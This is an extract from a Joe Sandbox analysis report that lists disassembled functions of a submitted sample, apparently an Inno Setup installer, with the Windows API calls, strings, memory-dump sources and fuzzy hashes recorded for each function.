Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69

Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Strings

,, xrefs: 00417D61

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68

Function 00463404 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59

Function 00463880 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49

Function 0042E7A8 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D

Function 00481CB0 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00481CEE
GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C

Function 00461E78 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A

Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241F4
SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201

Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021825AC,0042421A,?,?,?,0046BD86), ref: 00423B5F

SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8

Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8

Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004175D3
GetCapture.USER32 ref: 004175DC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758

Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241AB

Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF

Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724

Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759

Function 00477568 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54

Function 0045C95C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4

Function 0045C974 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C

Function 10001130 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3368938049.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.3368923755.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3368960254.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Function 10001000 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3368938049.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.3368923755.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3368960254.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction Fuzzy Hash:

Function 00457540 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845

Strings

ReleaseMutex, xrefs: 0045765A
LoadLibrary, xrefs: 004577A7
_isetup\_RegDLL.tmp, xrefs: 00457677
GetProcAddress, xrefs: 004577B9
D, xrefs: 004576BA
CreateProcess, xrefs: 00457702
REGDLL mutex wait failed (%d, %d), xrefs: 0045776F
Spawning _RegDLL.tmp, xrefs: 0045756C
OleInitialize, xrefs: 00457795
CreateFileMapping, xrefs: 004575D3
REGDLL returned unknown result code %d, xrefs: 0045780C
_RegDLL.tmp %u %u, xrefs: 004576A1
MapViewOfFile, xrefs: 004575FA
REGDLL failed with exit code 0x%x, xrefs: 00457739
CreateMutex, xrefs: 0045759B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
API String ID: 4012871263-351310198
Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
